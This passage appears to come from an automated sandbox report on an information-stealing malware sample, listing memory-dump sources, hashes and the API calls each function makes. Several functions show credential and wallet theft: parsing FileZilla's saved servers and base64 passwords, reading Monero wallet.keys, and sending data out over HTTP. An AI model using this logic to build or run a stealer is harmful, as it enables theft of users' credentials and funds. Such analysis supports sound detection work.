                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 492083080b728b06252473903854bf9104ceb445cae3cadcb477f263382544c7
                                      • Instruction ID: c5ca0582d9eb86b0a4dfa727a5d8b49f5e29f71f3a8ba37cb7f4def109320f83
                                      • Opcode Fuzzy Hash: 492083080b728b06252473903854bf9104ceb445cae3cadcb477f263382544c7
                                      • Instruction Fuzzy Hash: 274111F3B192045FF748AA3DEC8573AB7C6DBE8720F1A853DE688C7385E87558054246
                                      Function 012C7441 Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00839e0a91d238b87ce4c03f2761378edfceccfda6937213309a77204a63022c
                                      • Instruction ID: 791682d247fb286b5b4d333af65dbcdfa4eab30bc87db1d7d1e0329e3349d91c
                                      • Opcode Fuzzy Hash: 00839e0a91d238b87ce4c03f2761378edfceccfda6937213309a77204a63022c
                                      • Instruction Fuzzy Hash: 944188F39082045FD3146D3EED9432AB799DFE4320F2A4639BB80D3784E8BA5911428A
                                      Function 00F86799 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 208ce138e227d5cad45eb8eca8e6e162e8c65ab360a1b19a5ffb26f0a3cf3ff2
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: 67513B62E09BD585C7058B7544502EEBFB21FE6210F1E829EC49C5F383C3759689D3E5
                                      Function 014152DB Relevance: .1, Instructions: 100COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 581d0888438d113ac57163597703552e6b9927ecb08dae4831b329ecdd16bf94
                                      • Instruction ID: 3f3502599059d1db8c71a64c7fed1a641faaa1ee36d0df5749f336dbecaa8d33
                                      • Opcode Fuzzy Hash: 581d0888438d113ac57163597703552e6b9927ecb08dae4831b329ecdd16bf94
                                      • Instruction Fuzzy Hash: E53109B368D608DBD310AE14EC857FAB7E4EBC6311F05453F95C29F728E631281286D6
                                      Function 00F575A8 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                      • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                      Function 00F29AA0 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 00F203B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00F30DBF,00F30DBE,00F30DBB,00F30DBA), ref: 00F204C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F204C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F204E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F204F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F2052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F2053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00F20579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F205C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F205D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F2067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F20692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F206AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F206C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00F206D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00F206E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F206F3
                                      • lstrcat.KERNEL32(?,00F31770), ref: 00F20702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20715
                                      • lstrcat.KERNEL32(?,00F31774), ref: 00F20724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00F20733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20746
                                      • lstrcat.KERNEL32(?,00F31780), ref: 00F20755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00F20764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F20777
                                      • lstrcat.KERNEL32(?,00F31790), ref: 00F20786
                                      • lstrcat.KERNEL32(?,00F31794), ref: 00F20795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F30DB7), ref: 00F207EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: de743c5781ecf3ccf5d9e48c493dc7d7bded0ec9594ca7d31d104e30b079becd
                                      • Instruction ID: 0555a6936f5e143dbb730bab0231fbaa9bcfb18674998780fff2a162320c50b1
                                      • Opcode Fuzzy Hash: de743c5781ecf3ccf5d9e48c493dc7d7bded0ec9594ca7d31d104e30b079becd
                                      • Instruction Fuzzy Hash: 8BD16072D00218ABDB08EBF0ED56EEEB779BF54310F408558F512B6095DF38AA44DB62
                                      Function 00F159B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F15A48
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F15A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F15BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01D8E9E8,00000000,?,01D8A2A0,00000000,?,00F31B4C), ref: 00F15EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00F15ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F15EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F15EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00F15EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00F15F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F15F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00F15F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F15F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F15F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16000
                                      • InternetCloseHandle.WININET(00000000), ref: 00F1600D
                                      • HttpOpenRequestA.WININET(00000000,01D8EA38,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F15C48
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 8e1ce18ff2f90ddf615da7356b5a56b0bfbf5f6591b2664fd120fc7e5eda852b
                                      • Instruction ID: 4e0b5244a4cd5fc871f5e2510afb820fca9d9c3ff84f98500333d47ca167ac69
                                      • Opcode Fuzzy Hash: 8e1ce18ff2f90ddf615da7356b5a56b0bfbf5f6591b2664fd120fc7e5eda852b
                                      • Instruction Fuzzy Hash: 49120071920128ABCB19EBE0ECA5FEEB379BF54700F404599F10676091EF746A48DF61
                                      Function 00F1CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F1D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D308
                                      • lstrcat.KERNEL32(?,00F31570), ref: 00F1D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D32A
                                      • lstrcat.KERNEL32(?,00F31574), ref: 00F1D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D34C
                                      • lstrcat.KERNEL32(?,00F31578), ref: 00F1D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D36E
                                      • lstrcat.KERNEL32(?,00F3157C), ref: 00F1D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D390
                                      • lstrcat.KERNEL32(?,00F31580), ref: 00F1D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D3B2
                                      • lstrcat.KERNEL32(?,00F31584), ref: 00F1D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F1D3D4
                                      • lstrcat.KERNEL32(?,00F31588), ref: 00F1D3E3
                                        • Part of subcall function 00F2AB30: lstrlen.KERNEL32(00F14F55,?,?,00F14F55,00F30DDF), ref: 00F2AB3B
                                        • Part of subcall function 00F2AB30: lstrcpy.KERNEL32(00F30DDF,00000000), ref: 00F2AB95
                                      • lstrlen.KERNEL32(?), ref: 00F1D42A
                                      • lstrlen.KERNEL32(?), ref: 00F1D439
                                        • Part of subcall function 00F2AD80: StrCmpCA.SHLWAPI(00000000,00F31568,00F1D2A2,00F31568,00000000), ref: 00F2AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
